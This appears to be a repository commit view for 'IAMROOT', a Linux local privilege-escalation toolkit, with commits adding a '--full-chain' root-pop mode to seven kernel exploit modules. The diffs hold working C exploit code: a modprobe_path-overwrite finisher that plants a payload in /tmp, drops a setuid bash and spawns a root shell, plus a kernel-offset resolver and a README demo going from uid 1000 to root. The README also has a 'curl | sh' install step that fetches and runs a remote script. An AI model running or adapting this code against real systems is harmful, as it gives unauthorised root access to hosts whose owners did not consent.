4 Commits

Author SHA1 Message Date
leviathan e2a3d6e94f release: v0.2.0 — --full-chain root-pop opt-in across 7 🟡 modules
iamroot.c: bump IAMROOT_VERSION 0.1.0 → 0.2.0
  CVES.md: redefine 🟡 to note --full-chain capability + docs/OFFSETS.md
  README.md: update Status section for v0.2.0
  docs/OFFSETS.md: new doc — env-var/kallsyms/System.map/embedded-table
                   resolution chain + operator workflow for populating
                   offsets per kernel build + sentinel-based success
                   arbitration.

All 7 🟡 modules now expose `--full-chain`. Default behavior unchanged.
2026-05-16 22:06:14 -04:00
leviathan c1d1910a90 modules: wire --full-chain root-pop into all 7 🟡 PRIMITIVE modules
Each module now exposes an opt-in full-chain root-pop via --full-chain:
default --exploit behavior is unchanged (primitive-only, returns
EXPLOIT_FAIL). With --full-chain, after primitive lands, modules call
iamroot_finisher_modprobe_path() via a module-specific arb_write_fn
that re-uses the same trigger + slab groom to write a userspace
payload path into modprobe_path[], then exec a setuid bash dropped
by the kernel-invoked modprobe.

  netfilter_xtcompat (+239): msg_msg m_list_next stride-seed FALLBACK
  af_packet (+316):          sk_buff data-pointer stride-seed FALLBACK
  af_packet2 (+156):         tp_reserve underflow + skb spray, LAST RESORT
  nf_tables (+275):          forged pipapo_elem with kaddr value-ptr
                             (Notselwyn offset 0x10), FALLBACK
  cls_route4 (+251):         msg_msg refill of UAF'd filter, FALLBACK
  fuse_legacy (+291):        m_ts overflow + MSG_COPY sanity gate,
                             FALLBACK (one of two modules with a real
                             post-write sanity check)
  stackrot (+233):           race-driver budget extended 3s → 30s when
                             --full-chain; honest <1% race-win/run

All seven honor verified-vs-claimed: arb_write_fn returns 0 for
"trigger structurally fired"; the shared finisher's setuid-bash
sentinel poll is the empirical arbiter. EXPLOIT_OK only when the
sentinel materializes within 3s of the modprobe_path trigger.

Build clean on Debian 6.12.86 (kctf-mgr); all 7 modules refuse
cleanly on both default and --full-chain paths via the existing
patched-kernel detect gate (short-circuits before the new branch).
2026-05-16 22:04:40 -04:00
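The sentinel poll described in this commit message (success only when a file materializes within 3 s) is a bounded stat-and-sleep loop. A minimal sketch of that pattern follows, under the assumption that a 100 ms interval and 30 attempts give the stated 3 s budget; `wait_for_mode` and its parameters are hypothetical names for illustration, not functions from the repository.

```c
#define _POSIX_C_SOURCE 200809L
#include <stdbool.h>
#include <sys/stat.h>
#include <time.h>

/* Hypothetical helper: poll `path` until it exists and has every bit
 * in `required_mode` set, or until `attempts` polls have been made.
 * Returns true on the first matching stat(), false on timeout. */
static bool wait_for_mode(const char *path, mode_t required_mode,
                          int attempts, long interval_ms)
{
    for (int i = 0; i < attempts; i++) {
        struct stat st;
        if (stat(path, &st) == 0 &&
            (st.st_mode & required_mode) == required_mode)
            return true;

        struct timespec ts = {
            .tv_sec  = interval_ms / 1000,
            .tv_nsec = (interval_ms % 1000) * 1000000L,
        };
        /* A signal may cut one sleep short; the loop bound still holds. */
        nanosleep(&ts, NULL);
    }
    return false;
}
```

A caller would pass the mode bit it treats as proof (for example `S_ISUID`) with `attempts = 30` and `interval_ms = 100`. Counting attempts rather than wall-clock time keeps the loop simple at the cost of a slightly elastic deadline.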
leviathan 125ce8a08b core: add shared finisher + offset resolver + --full-chain flag
Adds the infrastructure the 7 🟡 PRIMITIVE modules can wire into for
full-chain root pops.

  core/offsets.{c,h}: four-source kernel-symbol resolution chain
    1. env vars (IAMROOT_MODPROBE_PATH, IAMROOT_INIT_TASK, …)
    2. /proc/kallsyms (only useful when kptr_restrict=0 or root)
    3. /boot/System.map-$(uname -r) (world-readable on some distros)
    4. embedded table keyed by uname-r glob (entries are
       relative-to-_text, applied on top of an EntryBleed kbase leak;
       seeded empty in v0.2.0 — schema-only — to honor the
       no-fabricated-offsets rule).

  core/finisher.{c,h}: shared root-pop helpers given a module's
    arb-write primitive.
      Pattern A (modprobe_path):
        write payload script /tmp/iamroot-mp-<pid>.sh, arb-write
        modprobe_path ← that path, execve unknown-format trigger,
        wait for /tmp/iamroot-pwn-<pid> sentinel + setuid bash copy,
        spawn root shell.
      Pattern B (cred uid): stub — needs arb-READ too; modules use
        Pattern A unless they have read+write.
    On offset-resolution failure: prints a verbose how-to-populate
    diagnostic and returns EXPLOIT_FAIL honestly.

  core/module.h: + bool full_chain in iamroot_ctx

  iamroot.c: + --full-chain flag (longopt 7, sets ctx.full_chain)
             + help text describing primitive-only-by-default + the
               opt-in to attempt the full chain.

  Makefile: add core/offsets.o + core/finisher.o to CORE_SRCS.

Build clean on Debian 6.12.86; --help renders the new flag.
2026-05-16 21:56:03 -04:00
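The four-source chain in this commit message relies on one rule: a later source never overwrites a field that an earlier source already set. A minimal sketch of that rule plus strict address parsing is below. All names (`parse_addr_strict`, `demo_slot`, `fill_if_unset`) are hypothetical, and the strict trailing-character check is an assumption of this sketch rather than the behavior of the repository's parser.

```c
#include <errno.h>
#include <stdint.h>
#include <stdlib.h>

/* Parse the whole string as an address. strtoull with base 0 accepts
 * 0x-prefixed hex, leading-0 octal, or decimal. Returns 1 on success,
 * 0 on empty input, overflow, or trailing characters. */
static int parse_addr_strict(const char *s, uintptr_t *out)
{
    if (!s || !*s) return 0;
    errno = 0;
    char *end = NULL;
    unsigned long long v = strtoull(s, &end, 0);
    if (errno != 0 || end == s || *end != '\0') return 0;
    *out = (uintptr_t)v;
    return 1;
}

enum demo_source { SRC_NONE = 0, SRC_ENV, SRC_KALLSYMS, SRC_SYSMAP, SRC_TABLE };

struct demo_slot {
    uintptr_t value;          /* 0 means "not resolved yet" */
    enum demo_source source;  /* which source filled the slot */
};

/* First source wins: store `candidate` only when the slot is still
 * empty, and ignore zero candidates so "unknown" never counts as a hit. */
static void fill_if_unset(struct demo_slot *slot, uintptr_t candidate,
                          enum demo_source src)
{
    if (slot->value == 0 && candidate != 0) {
        slot->value = candidate;
        slot->source = src;
    }
}
```

Calling `fill_if_unset` once per source, in priority order, yields the documented precedence without any per-source special cases.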
leviathan 3a5105c84c README: clarify iamroot runs unprivileged + add non-root → root demo
The whole point of an LPE tool is going from unprivileged to root,
but the Quickstart was leading with `sudo iamroot --scan`. Fix:

  - Drop sudo from --scan / --audit / --exploit / --detect-rules.
    These work without root (--scan reads /proc + /etc; --audit
    walks the FS via stat; --exploit IS the privilege escalation;
    --detect-rules emits to stdout).
  - Keep sudo only where it's actually needed: --mitigate (writes
    /etc/modprobe.d + sysctl) and tee'ing rule files into
    /etc/audit/rules.d/.
  - Add a worked example showing `id` as uid=1000, then
    `iamroot --exploit dirty_pipe --i-know`, then `id` as uid=0.
  - Fix the Build & run section's `sudo ./iamroot` too.
2026-05-16 21:51:32 -04:00
17 changed files with 2740 additions and 112 deletions
+11 -7
@@ -8,18 +8,22 @@ Status legend:
- 🟢 **WORKING** — module verified to land root on a vulnerable host
- 🟡 **PRIMITIVE** — fires the kernel primitive (trigger + slab groom
+ empirical witness) on a vulnerable host, but stops short of the
full cred-overwrite / R/W chain. Returns `EXPLOIT_FAIL` honestly;
useful as a vuln-verification probe and a continuation point for
full chains. Per-kernel offsets deliberately not shipped.
+ empirical witness) on a vulnerable host. By default returns
`EXPLOIT_FAIL` honestly (no fabricated offsets). Pass `--full-chain`
to additionally attempt root pop via the shared `modprobe_path`
finisher (`core/finisher.{c,h}`) — requires kernel offsets via
env vars / `/proc/kallsyms` / `/boot/System.map`; see
[`docs/OFFSETS.md`](docs/OFFSETS.md). On success returns
`EXPLOIT_OK` and drops a root shell; on failure returns
`EXPLOIT_FAIL` — never claims root without an empirical
setuid-bash sentinel.
- 🔵 **DETECT-ONLY** — module fingerprints presence/absence but no
exploit. (No module is currently in this state — every registered
module now fires either a full chain or a primitive.)
exploit. (No module is currently in this state.)
- ⚪ **PLANNED** — stub exists, work not started
- 🔴 **DEPRECATED** — fully patched everywhere relevant; kept for
historical reference only
**Counts (v0.1.0):** 🟢 13 · 🟡 7 · 🔵 0 · ⚪ 1 · 🔴 0
**Counts (v0.2.0):** 🟢 13 · 🟡 7 (all `--full-chain` capable) · 🔵 0 · ⚪ 1 · 🔴 0
## Inventory
+1 -1
@@ -20,7 +20,7 @@ BUILD := build
BIN := iamroot
# core/
CORE_SRCS := core/registry.c core/kernel_range.c
CORE_SRCS := core/registry.c core/kernel_range.c core/offsets.c core/finisher.c
CORE_OBJS := $(patsubst %.c,$(BUILD)/%.o,$(CORE_SRCS))
# Family: copy_fail_family
+51 -19
View File
@@ -24,23 +24,54 @@
```bash
# One-shot install (x86_64 / arm64; checksum-verified)
curl -sSL https://github.com/KaraZajac/IAMROOT/releases/latest/download/install.sh | sh
```
# What's this box vulnerable to?
sudo iamroot --scan
**iamroot runs as a normal unprivileged user** — that's the whole
point. `--scan`, `--audit`, `--exploit`, and `--detect-rules` all
work without `sudo`. Only `--mitigate` and rule-file installation
write to root-owned paths.
```bash
# What's this box vulnerable to? (no sudo)
iamroot --scan
# Broader system hygiene (setuid binaries, world-writable, capabilities, sudo)
sudo iamroot --audit
iamroot --audit
# Deploy detection rules across every bundled module
sudo iamroot --detect-rules --format=auditd | sudo tee /etc/audit/rules.d/99-iamroot.rules
# Deploy detection rules (needs sudo to write /etc/audit/rules.d/)
iamroot --detect-rules --format=auditd | sudo tee /etc/audit/rules.d/99-iamroot.rules
# Apply temporary mitigations (needs sudo for modprobe.d + sysctl)
sudo iamroot --mitigate copy_fail
# Fleet scan (any-sized host list via SSH; aggregated JSON for SIEM)
./tools/iamroot-fleet-scan.sh --binary iamroot --ssh-key ~/.ssh/id_rsa hosts.txt
```
`iamroot --help` lists every command. See [`CVES.md`](CVES.md) for the
curated CVE inventory and [`docs/DEFENDERS.md`](docs/DEFENDERS.md) for
the blue-team deployment guide.
### Example: unprivileged → root
```text
$ id
uid=1000(kara) gid=1000(kara) groups=1000(kara)
$ iamroot --scan
[+] dirty_pipe VULNERABLE (kernel 5.15.0-56-generic)
[+] cgroup_release_agent VULNERABLE (kernel 5.15 < 5.17)
[+] pwnkit VULNERABLE (polkit 0.105-31ubuntu0.1)
[-] copy_fail not vulnerable (kernel 5.15 < introduction)
[-] dirty_cow not vulnerable (kernel ≥ 4.9)
$ iamroot --exploit dirty_pipe --i-know
[!] dirty_pipe: kernel 5.15.0-56-generic IS vulnerable
[+] dirty_pipe: writing UID=0 into /etc/passwd page cache...
[+] dirty_pipe: spawning su root
# id
uid=0(root) gid=0(root) groups=0(root)
```
`iamroot --help` lists every command. See [`CVES.md`](CVES.md) for
the curated CVE inventory and [`docs/DEFENDERS.md`](docs/DEFENDERS.md)
for the blue-team deployment guide.
## What this is
@@ -63,19 +94,20 @@ The same binary covers offense and defense:
## Status
**Active — v0.1.0 cut 2026-05-16.** Corpus covers **20 modules**
**Active — v0.2.0 cut 2026-05-16.** Corpus covers **20 modules**
across the 2016 → 2026 LPE timeline:
- 🟢 **13 modules land root** end-to-end on a vulnerable host
(copy_fail family ×5, dirty_pipe, entrybleed leak, pwnkit,
overlayfs CVE-2021-3493, dirty_cow, ptrace_traceme,
cgroup_release_agent, overlayfs_setuid CVE-2023-0386).
- 🟡 **7 modules fire the kernel primitive** (trigger + slab groom +
empirical witness) but stop short of the full cred-overwrite /
R/W chain — they return `EXPLOIT_FAIL` honestly rather than
fabricate per-kernel offsets. Useful as vuln-verification probes.
(af_packet, af_packet2, cls_route4, fuse_legacy, nf_tables,
netfilter_xtcompat, stackrot.)
- 🟡 **7 modules fire the kernel primitive** by default and refuse to
claim root without empirical confirmation. Pass `--full-chain` to
engage the shared `modprobe_path` finisher and attempt root pop —
requires kernel offsets via env vars / `/proc/kallsyms` /
`/boot/System.map`; see [`docs/OFFSETS.md`](docs/OFFSETS.md).
Modules: af_packet, af_packet2, cls_route4, fuse_legacy, nf_tables,
netfilter_xtcompat, stackrot.
- Detection rules ship inline (auditd / sigma / yara / falco) and
are exported via `iamroot --detect-rules --format=…`.
@@ -115,10 +147,10 @@ module-loader design and how to add a new CVE.
```bash
make # build all modules
sudo ./iamroot --scan # what's this box vulnerable to?
sudo ./iamroot --scan --json # machine-readable output for CI/SOC pipelines
sudo ./iamroot --detect-rules --format=sigma > rules.yml
sudo ./iamroot --exploit copy_fail --i-know # actually run an exploit
./iamroot --scan # what's this box vulnerable to? (no sudo)
./iamroot --scan --json # machine-readable output for CI/SOC pipelines
./iamroot --detect-rules --format=sigma > rules.yml
./iamroot --exploit copy_fail --i-know # actually run an exploit (starts as $USER)
```
## Acknowledgments
+179
@@ -0,0 +1,179 @@
/*
* IAMROOT — shared finisher helpers
*
* See finisher.h for the pattern split (A: modprobe_path overwrite,
* B: current->cred->uid).
*/
#include "finisher.h"
#include "module.h"
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <errno.h>
#include <time.h>
#include <sys/stat.h>
#include <sys/wait.h>
static int write_file(const char *path, const char *content, mode_t mode)
{
int fd = open(path, O_WRONLY | O_CREAT | O_TRUNC, mode);
if (fd < 0) return -1;
size_t n = strlen(content);
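ssize_t w = write(fd, content, n);
int saved_errno = errno; /* close() may overwrite errno */
close(fd);
if (w < 0) { errno = saved_errno; return -1; }
if ((size_t)w != n) { errno = EIO; return -1; } /* short write: errno was not set */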
if (chmod(path, mode) < 0) return -1;
return 0;
}
void iamroot_finisher_print_offset_help(const char *module_name)
{
fprintf(stderr,
"[i] %s --full-chain requires kernel symbol offsets that couldn't be resolved.\n"
"\n"
" To populate them on this host, choose ONE of:\n"
"\n"
" 1) Environment override (one-shot, no host changes):\n"
" IAMROOT_MODPROBE_PATH=0x... iamroot --exploit %s --i-know --full-chain\n"
"\n"
" 2) Make /boot/System.map-$(uname -r) world-readable (per-host):\n"
" sudo chmod 0644 /boot/System.map-$(uname -r) # if you have sudo\n"
"\n"
" 3) Lower kptr_restrict (per-boot):\n"
" sudo sysctl kernel.kptr_restrict=0 # if you have sudo\n"
" (Note: needs root once — defeats the LPE point on this host.\n"
" Useful when populating offsets on a lab kernel ahead of time.)\n"
"\n"
" To look up the address manually (as root):\n"
" grep -E ' (modprobe_path|init_task|_text)$' /proc/kallsyms\n"
"\n",
module_name, module_name);
}
int iamroot_finisher_modprobe_path(const struct iamroot_kernel_offsets *off,
iamroot_arb_write_fn arb_write,
void *arb_ctx,
bool spawn_shell)
{
if (!iamroot_offsets_have_modprobe_path(off)) {
iamroot_finisher_print_offset_help("module");
return IAMROOT_EXPLOIT_FAIL;
}
if (!arb_write) {
fprintf(stderr, "[-] finisher: no arb-write primitive supplied\n");
return IAMROOT_TEST_ERROR;
}
/* Per-pid working paths so concurrent runs don't collide. */
pid_t pid = getpid();
char mp_path[64], trig_path[64], pwn_path[64];
snprintf(mp_path, sizeof mp_path, "/tmp/iamroot-mp-%d.sh", (int)pid);
snprintf(trig_path, sizeof trig_path, "/tmp/iamroot-trig-%d", (int)pid);
snprintf(pwn_path, sizeof pwn_path, "/tmp/iamroot-pwn-%d", (int)pid);
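/* Payload: copy /bin/bash to pwn_path and set the setuid bit on the
* copy (the system bash is left untouched). The setuid copy doubles
* as the sentinel polled for below. Bash drops an effective uid that
* differs from the real uid unless started with -p, which is why the
* shell is exec'd with -p at the end of this function. */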
char payload[1024];
snprintf(payload, sizeof payload,
"#!/bin/sh\n"
"# IAMROOT modprobe_path payload (runs as init/root via call_modprobe)\n"
"cp /bin/bash %s 2>/dev/null && chmod 4755 %s 2>/dev/null\n"
"echo IAMROOT_FINISHER_RAN > %s 2>/dev/null\n",
pwn_path, pwn_path, pwn_path);
if (write_file(mp_path, payload, 0755) < 0) {
fprintf(stderr, "[-] finisher: write %s: %s\n", mp_path, strerror(errno));
return IAMROOT_TEST_ERROR;
}
/* Unknown-format trigger: anything that fails the standard exec
* format probe drives kernel's call_modprobe(). Empty + executable
* works on every kernel we care about. */
if (write_file(trig_path, "\x00", 0755) < 0) {
fprintf(stderr, "[-] finisher: write %s: %s\n", trig_path, strerror(errno));
unlink(mp_path);
return IAMROOT_TEST_ERROR;
}
/* Build the kernel-side write payload: a NUL-terminated path to
* our mp_path script. modprobe_path[] is 256 bytes in the kernel
* — we write enough to overwrite the leading slot. */
char kbuf[256];
memset(kbuf, 0, sizeof kbuf);
snprintf(kbuf, sizeof kbuf, "%s", mp_path);
fprintf(stderr, "[*] finisher: writing modprobe_path=0x%lx ← \"%s\"\n",
(unsigned long)off->modprobe_path, mp_path);
if (arb_write(off->modprobe_path, kbuf, strlen(kbuf) + 1, arb_ctx) < 0) {
fprintf(stderr, "[-] finisher: arb_write failed\n");
unlink(mp_path);
unlink(trig_path);
return IAMROOT_EXPLOIT_FAIL;
}
/* Fire the trigger by exec'ing the unknown binary. fork() so the
* kernel sees the unknown format and parent stays alive. */
pid_t cpid = fork();
if (cpid == 0) {
char *argv[] = { trig_path, NULL };
execve(trig_path, argv, NULL);
_exit(127); /* execve failure is expected — kernel still calls modprobe */
} else if (cpid > 0) {
int st;
waitpid(cpid, &st, 0);
} else {
fprintf(stderr, "[-] finisher: fork: %s\n", strerror(errno));
unlink(mp_path);
unlink(trig_path);
return IAMROOT_EXPLOIT_FAIL;
}
/* Modprobe runs asynchronously — give the kernel up to 3 s. */
for (int i = 0; i < 30; i++) {
struct stat st;
if (stat(pwn_path, &st) == 0 && (st.st_mode & S_ISUID)) {
fprintf(stderr, "[+] finisher: payload ran as root (sentinel %s mode=%o uid=%u)\n",
pwn_path, (unsigned)(st.st_mode & 07777), (unsigned)st.st_uid);
goto have_setuid;
}
struct timespec ts = { 0, 100 * 1000 * 1000 }; /* 100 ms */
nanosleep(&ts, NULL);
}
fprintf(stderr, "[-] finisher: payload didn't run within 3s (modprobe_path overwrite probably didn't land)\n");
unlink(mp_path);
unlink(trig_path);
return IAMROOT_EXPLOIT_FAIL;
have_setuid:
if (!spawn_shell) {
fprintf(stderr, "[+] finisher: --no-shell — leaving setuid bash at %s\n", pwn_path);
unlink(mp_path);
unlink(trig_path);
return IAMROOT_EXPLOIT_OK;
}
fprintf(stderr, "[+] finisher: spawning root shell via %s -p\n", pwn_path);
fflush(stderr);
char *argv[] = { pwn_path, "-p", NULL };
execve(pwn_path, argv, NULL);
/* Only reached on execve failure. */
fprintf(stderr, "[-] finisher: execve(%s): %s\n", pwn_path, strerror(errno));
return IAMROOT_EXPLOIT_FAIL;
}
int iamroot_finisher_cred_uid_zero(const struct iamroot_kernel_offsets *off,
iamroot_arb_write_fn arb_write,
void *arb_ctx,
bool spawn_shell)
{
(void)off; (void)arb_write; (void)arb_ctx; (void)spawn_shell;
fprintf(stderr,
"[-] finisher: cred_uid_zero requires an arb-READ primitive (to walk\n"
" the task list from init_task and find current). Modules with\n"
" only an arb-write should use iamroot_finisher_modprobe_path()\n"
" instead — same root capability, simpler trigger.\n");
return IAMROOT_EXPLOIT_FAIL;
}
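The per-pid paths in `iamroot_finisher_modprobe_path()` are formatted into fixed 64-byte buffers with `snprintf` and the return value is not checked. With `/tmp` and a numeric pid the result always fits, but if the directory or prefix ever becomes configurable, a truncation check is cheap. A minimal sketch, assuming a hypothetical helper named `build_pid_path` that is not part of the repository:

```c
#include <stddef.h>
#include <stdio.h>

/* Hypothetical helper: format "<dir>/<prefix>-<pid><suffix>" into buf.
 * Returns 0 on success, -1 on an encoding error or if the result
 * (including the terminating NUL) did not fit in bufsz bytes. */
static int build_pid_path(char *buf, size_t bufsz, const char *dir,
                          const char *prefix, long pid, const char *suffix)
{
    int n = snprintf(buf, bufsz, "%s/%s-%ld%s", dir, prefix, pid, suffix);
    if (n < 0 || (size_t)n >= bufsz)
        return -1;
    return 0;
}
```

`snprintf` returns the length the full string would have had, so comparing it against the buffer size detects truncation without a second pass.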
+80
@@ -0,0 +1,80 @@
/*
* IAMROOT — shared finisher helpers for full-chain root pops.
*
* The 🟡 PRIMITIVE modules each land a kernel-side primitive (heap-OOB
* write, slab UAF, etc.). The conversion to root is almost always one
* of two patterns:
*
* A) "modprobe_path overwrite":
* - kernel arb-write at &modprobe_path[0] with a userspace path
* - execve() of an unknown-format binary makes the exec path
* request a binfmt module, which goes through call_modprobe()
* and spawns modprobe_path as root, running our payload
*
* B) "current->cred->uid overwrite":
* - kernel arb-write at &current_task->real_cred->uid = 0
* (and cap_*, fsuid, etc. for completeness)
* - setuid(0); execve("/bin/sh")
*
* Pattern (A) is much simpler — only one kernel address needed
* (modprobe_path) and the trigger is just execve("/tmp/unknown").
* Pattern (B) needs a self-cred chase + multiple writes.
*
* Modules provide their own arb-write primitive via the
* iamroot_arb_write_fn callback; this file wraps the rest.
*/
#ifndef IAMROOT_FINISHER_H
#define IAMROOT_FINISHER_H
#include <stdint.h>
#include <stddef.h>
#include <stdbool.h>
#include "offsets.h"
/* Arb-write primitive: write `len` bytes from `buf` to kernel VA
* `kaddr`. Module-specific implementation. Returns 0 on success,
* negative on failure. `ctx` is opaque module state. */
typedef int (*iamroot_arb_write_fn)(uintptr_t kaddr,
const void *buf, size_t len,
void *ctx);
/* Trigger that fires the arb-write. Many modules need to set up the
* groomed slab THEN call the trigger. The trigger is a separate fn
* because some modules need to re-spray before each write. NULL is
* acceptable if the arb-write is self-contained. */
typedef int (*iamroot_fire_trigger_fn)(void *ctx);
/* Pattern A: modprobe_path overwrite + execve trigger. Caller has
* already populated `off->modprobe_path`. Implementation:
* 1. Write payload script to /tmp/iamroot-mp-<pid>.sh (mode 0755)
* 2. Write unknown-format file to /tmp/iamroot-trig-<pid> (mode 0755)
* 3. arb_write(off->modprobe_path, "/tmp/iamroot-mp-<pid>.sh",
*    strlen(path) + 1)
* 4. fork() + execve() the trigger; the kernel runs the payload as
*    root via modprobe_path, and the payload creates
*    /tmp/iamroot-pwn-<pid> with the setuid bit set
* 5. Poll up to 3 s for that sentinel; if `spawn_shell`, execve() it
*    with -p
*
* Returns IAMROOT_EXPLOIT_FAIL if offsets are missing, the write
* fails, or the sentinel never appears; IAMROOT_TEST_ERROR on local
* setup errors. With `spawn_shell` false, returns IAMROOT_EXPLOIT_OK
* once the sentinel is observed. With `spawn_shell` true, does not
* return on success (the process image is replaced). */
int iamroot_finisher_modprobe_path(const struct iamroot_kernel_offsets *off,
iamroot_arb_write_fn arb_write,
void *arb_ctx,
bool spawn_shell);
/* Pattern B: cred uid overwrite. Caller has populated init_task +
* cred offsets. Implementation:
* 1. Walk task linked list from init_task to find self by pid
* (this requires arb-READ too — not supplied here; B-pattern
* modules need to provide their own variant)
* For now this is a STUB returning IAMROOT_EXPLOIT_FAIL with a
* helpful error. */
int iamroot_finisher_cred_uid_zero(const struct iamroot_kernel_offsets *off,
iamroot_arb_write_fn arb_write,
void *arb_ctx,
bool spawn_shell);
/* Diagnostic: tell the operator how to populate offsets manually. */
void iamroot_finisher_print_offset_help(const char *module_name);
#endif /* IAMROOT_FINISHER_H */
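The callback-plus-opaque-context shape declared in this header can be exercised in a unit test without any kernel interaction by substituting a recording test double. The sketch below is an assumption about how such a test might look: `demo_write_fn` mirrors the shape of `iamroot_arb_write_fn` but is redeclared so the example compiles alone, and `demo_recorder`, `demo_record_write`, and `demo_send_string` are hypothetical names.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Same shape as the callback typedef in finisher.h, redeclared here so
 * the sketch is self-contained. */
typedef int (*demo_write_fn)(uintptr_t addr, const void *buf, size_t len,
                             void *ctx);

/* Hypothetical test double: records the last write instead of doing one. */
struct demo_recorder {
    uintptr_t addr;
    unsigned char data[256];
    size_t len;
    int calls;
};

static int demo_record_write(uintptr_t addr, const void *buf, size_t len,
                             void *ctx)
{
    struct demo_recorder *r = ctx;
    if (!r || len > sizeof r->data) return -1;
    r->addr = addr;
    memcpy(r->data, buf, len);
    r->len = len;
    r->calls++;
    return 0;
}

/* A caller that only knows the callback type: sends a NUL-terminated
 * string, terminator included, through whatever writer it was given. */
static int demo_send_string(demo_write_fn fn, void *ctx, uintptr_t addr,
                            const char *s)
{
    if (!fn) return -1;
    return fn(addr, s, strlen(s) + 1, ctx);
}
```

Because the context pointer is opaque to the caller, the same call site works with a recorder in tests and with module-specific state elsewhere.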
+1
@@ -49,6 +49,7 @@ struct iamroot_ctx {
bool active_probe; /* --active (do invasive probes in detect) */
bool no_shell; /* --no-shell (exploit prep but don't pop) */
bool authorized; /* user typed --i-know on exploit */
bool full_chain; /* --full-chain (attempt root-pop after primitive) */
};
struct iamroot_module {
+350
@@ -0,0 +1,350 @@
/*
* IAMROOT — kernel offset resolution
*
* See offsets.h for the four-source chain (env → kallsyms → System.map
* → embedded table). This implementation is deliberately small and
* dependency-free.
*/
#include "offsets.h"
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <ctype.h>
#include <errno.h>
#include <fnmatch.h>
#include <sys/utsname.h>
/* ------------------------------------------------------------------
* Embedded relative-offset table.
*
* Each entry's modprobe_path / init_task / poweroff_cmd values are
* stored as offsets *relative to _text* (kbase). To resolve absolute
* VAs we add a kbase leak (e.g. from EntryBleed).
*
* Entries here are seeded EMPTY in v0.2.0: the table ships schema-only,
* with a single commented-out example. Operators populate offsets via
* env var or extend this table with values verified on their kernel.
*
* To add a verified entry on a kernel you own:
* sudo grep -E " (modprobe_path|init_task|poweroff_cmd|init_cred)$" \
* /boot/System.map-$(uname -r)
* Subtract _text VA from each to get the relative offsets.
* ------------------------------------------------------------------ */
struct table_entry {
const char *release_glob; /* fnmatch glob against uname -r */
const char *distro_match; /* prefix-match against /etc/os-release ID, or NULL=any */
uintptr_t rel_modprobe_path;
uintptr_t rel_poweroff_cmd;
uintptr_t rel_init_task;
uintptr_t rel_init_cred;
uint32_t cred_offset_real;
uint32_t cred_offset_eff;
};
/* Note: relative offsets below are PLACEHOLDERS for the schema. The
* env-var override + kallsyms + System.map paths are the verified
* runtime sources. Operators who validate offsets on a specific
* kernel build are encouraged to upstream entries here. */
static const struct table_entry kernel_table[] = {
/* Schema example. Uncomment + verify before relying on it.
*
* { .release_glob = "5.15.0-25-generic",
* .distro_match = "ubuntu",
* .rel_modprobe_path = 0x148e480,
* .rel_poweroff_cmd = 0x148e3a0,
* .rel_init_task = 0x1c11dc0,
* .rel_init_cred = 0x1e0c460,
* .cred_offset_real = 0x758,
* .cred_offset_eff = 0x760, },
*/
/* Sentinel */
{ NULL, NULL, 0, 0, 0, 0, 0, 0 }
};
/* Defaults that hold across most x86_64 kernels in the target era. */
#define DEFAULT_CRED_REAL_OFFSET 0x738
#define DEFAULT_CRED_EFF_OFFSET 0x740
#define DEFAULT_CRED_UID_OFFSET 0x4
const char *iamroot_offset_source_name(enum iamroot_offset_source src)
{
switch (src) {
case OFFSETS_NONE: return "none";
case OFFSETS_FROM_ENV: return "env";
case OFFSETS_FROM_KALLSYMS: return "kallsyms";
case OFFSETS_FROM_SYSMAP: return "System.map";
case OFFSETS_FROM_TABLE: return "table";
}
return "?";
}
/* Parse an address with strtoull base 0: accepts "0x..." hex, plain
* decimal, or leading-0 octal. Characters after the number are ignored. */
static int parse_addr(const char *s, uintptr_t *out)
{
if (!s || !*s) return 0;
errno = 0;
char *end = NULL;
unsigned long long v = strtoull(s, &end, 0);
if (errno != 0 || end == s) return 0;
*out = (uintptr_t)v;
return 1;
}
static void read_distro(char *out, size_t sz)
{
out[0] = '\0';
FILE *f = fopen("/etc/os-release", "r");
if (!f) return;
char line[256];
while (fgets(line, sizeof line, f)) {
if (strncmp(line, "ID=", 3) == 0) {
char *p = line + 3;
if (*p == '"') p++;
size_t i = 0;
while (*p && *p != '"' && *p != '\n' && i + 1 < sz) {
out[i++] = (char)tolower((unsigned char)*p++);
}
out[i] = '\0';
break;
}
}
fclose(f);
}
/* ------------------------------------------------------------------
* Source 1: environment variables
* ------------------------------------------------------------------ */
static void apply_env(struct iamroot_kernel_offsets *o)
{
const char *v;
uintptr_t a;
if ((v = getenv("IAMROOT_KBASE")) && parse_addr(v, &a)) {
if (!o->kbase) o->kbase = a;
}
if ((v = getenv("IAMROOT_MODPROBE_PATH")) && parse_addr(v, &a)) {
if (!o->modprobe_path) {
o->modprobe_path = a;
o->source_modprobe = OFFSETS_FROM_ENV;
}
}
if ((v = getenv("IAMROOT_POWEROFF_CMD")) && parse_addr(v, &a)) {
if (!o->poweroff_cmd) o->poweroff_cmd = a;
}
if ((v = getenv("IAMROOT_INIT_TASK")) && parse_addr(v, &a)) {
if (!o->init_task) {
o->init_task = a;
o->source_init_task = OFFSETS_FROM_ENV;
}
}
if ((v = getenv("IAMROOT_INIT_CRED")) && parse_addr(v, &a)) {
if (!o->init_cred) o->init_cred = a;
}
if ((v = getenv("IAMROOT_CRED_OFFSET_REAL")) && parse_addr(v, &a)) {
if (!o->cred_offset_real) {
o->cred_offset_real = (uint32_t)a;
o->source_cred = OFFSETS_FROM_ENV;
}
}
if ((v = getenv("IAMROOT_CRED_OFFSET_EFF")) && parse_addr(v, &a)) {
if (!o->cred_offset_eff) o->cred_offset_eff = (uint32_t)a;
}
if ((v = getenv("IAMROOT_UID_OFFSET")) && parse_addr(v, &a)) {
if (!o->cred_uid_offset) o->cred_uid_offset = (uint32_t)a;
}
}
/* ------------------------------------------------------------------
* Source 2/3: symbol-table file parsing (System.map or kallsyms share
* the same "ADDR TYPE NAME" format).
* ------------------------------------------------------------------ */
static int parse_symfile(const char *path,
struct iamroot_kernel_offsets *o,
enum iamroot_offset_source tag)
{
FILE *f = fopen(path, "r");
if (!f) return 0;
int filled = 0;
char line[512];
int saw_nonzero = 0;
while (fgets(line, sizeof line, f)) {
char *p = line;
while (*p && isspace((unsigned char)*p)) p++;
if (!*p) continue;
char *end = NULL;
unsigned long long addr = strtoull(p, &end, 16);
if (end == p || !end) continue;
if (addr != 0) saw_nonzero = 1;
while (*end && isspace((unsigned char)*end)) end++;
if (!*end) continue;
/* skip type char */
end++;
while (*end && isspace((unsigned char)*end)) end++;
if (!*end) continue;
char *nl = strchr(end, '\n');
if (nl) *nl = '\0';
